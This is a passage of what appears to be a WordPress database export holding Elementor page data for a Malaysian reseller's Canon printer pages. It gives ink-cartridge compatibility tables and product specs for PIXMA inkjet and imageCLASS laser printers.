width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-10<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-72 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-100<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-42 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Light Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TR8570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS207<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS307<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS5070<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-771 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-770 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-770XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS5170<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"736141f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9e8521a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS8270<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS9170<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS9570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(6839,3290,'_elementor_version','2.5.14'),(6857,3293,'_elementor_edit_mode','builder'),(6842,3291,'_wp_page_template','template-fullwidth.php'),(6843,3291,'_elementor_edit_mode','builder'),(6844,3291,'_elementor_template_type','post'),(6845,3291,'_elementor_data','[{\"id\":\"9ac79cf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"2a109eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d59285\",\"elType\":\"widget\",\"settings\":{\"title\":\"Injet Printers :-\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca9ead8\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"9a9d292\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"align\":\"center\"},\"elements\":[{\"id\":\"6ad8678\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E560 \\/ E560R\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70128a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\",\"id\":2345}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"509ac9b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Advanced Wireless All-In-One with Auto Duplex\\u00a0<span style=\\\"font-size: 0.875rem;\\\">Printing for Low-Cost Printing<\\/span><\\/p><p>The Ink Efficient E560 \\/ E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.<\\/p><p>Available in Black and Red.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO Standard print speed (A4): up to 9.9ipm black \\/ 5.7ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi<\\/p><p>Recommended print volume: 80 - 400 pages<\\/p><p>\\u00a0<\\/p><p>\\u00a0<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center><p>\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"19ec1cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"d3a1ece\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E4270\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"47167d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\",\"id\":2346}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"c56690e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing<\\/p><p>This compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.<\\/p><p>Print, Scan, Copy, Fax<\\/p><p>ISO standard print speed (A4): 8.8ipm black \\/ 4.4ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct<\\/p><p>Recommended print volume: 50 - 200 pages<\\/p><p>\\u00a0<\\/p><center><\\/center><center><\\/center><center><\\/center><center><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"11\\\" ]<\\/span><\\/center><p>\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"692b43d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a99e262\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS9570\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6a04479\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\",\"id\":2347}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6ab42ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>A3 Wireless Photo Printer with Large 4.3\\u201d Touch-Screen and Auto Document Feeder<\\/p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless\\/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 80 - 300 pages<\\/p><p>&lt;center&gt;[maxbutton id=\\\"11\\\" ]&lt;\\/center&gt;<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"657c5e2\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1c9048c\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS8270\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e5da999\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\",\"id\":2348}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8c06b04\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless Photo All-In-One with Large 4.3\\u201d Touch-Screen and Auto Duplex Printing<\\/p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.<\\/p><p>Available in Black, Red and White.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 30 - 100 pages<\\/p><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e19c5ed\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"48b8328\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"619d0d9\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G2010\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b641ed3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\",\"id\":2349}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"cb6e9e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan &amp; Copy<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ef95652\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"72caeea\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G4010\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a96790\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/095399e7118a4e898b6df8c1808358de_g4010_03.png\",\"id\":2351}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"bc59f5a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost.<\\/p><p>Print, Scan, Copy and Fax<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49effc0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"79b85a4\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G1010\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4266d0e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\",\"id\":2352}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"79cfa28\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Printer for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) \\/ 5.0ipm (colour)<\\/p><p>Photo Speed (4 x 6\\\"): 60sec. (borderless)<\\/p><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"35746a1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9b7f21a\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G3010\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b8c2962\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/abbc0420f899426c86b9f547f8e0476d_g3010_01.png\",\"id\":2721}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ca1fadd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan &amp; Copy<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1ffb94f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"84b94b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"130ead1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Laser Printers :-\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"219f45c\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"39c2015\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ece285e\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS LBP113w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1273d18\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png\",\"id\":2724}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6b60692\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><h4 class=\\\"sub-title\\\">Compact with wireless connectivity<\\/h4><\\/div><p>Simple to operate and compact in size, the ideal choice for your printing needs.<\\/p><ul class=\\\"list-normal\\\"><li>Print<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>First Print Out Time (A4): Approx. 6.5 sec<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><li>Mobile Connectivity.<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f6acb91\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"001a8d3\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF269dw\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a672fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png\",\"id\":2725}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"fb9d4fc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>The Multifunction printing solution with Duplex Auto Document Feeder (DADF)<\\/strong><\\/p><\\/div><p>Enjoy greater efficiency. With the duplex auto document feeder, ensure shorter copying and scanning times.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 28ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 5.2 sec<\\/li><li>Max. paper input capacity: 251 sheets<\\/li><li>Print resolution: 1,200 \\u00d7 1,200 dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1f6f8ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a880ac9\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF266dn\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d63382c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png\",\"id\":2726}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"73a1481\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>The Multifunction printing solution with Mobile Printing and Network<\\/strong><\\/p><\\/div><p>Featuring Network printing and SEND technology, MF266dn is the productive choice for your business operations.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 28ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 5.2 sec<\\/li><li>Max. paper input capacity: 251 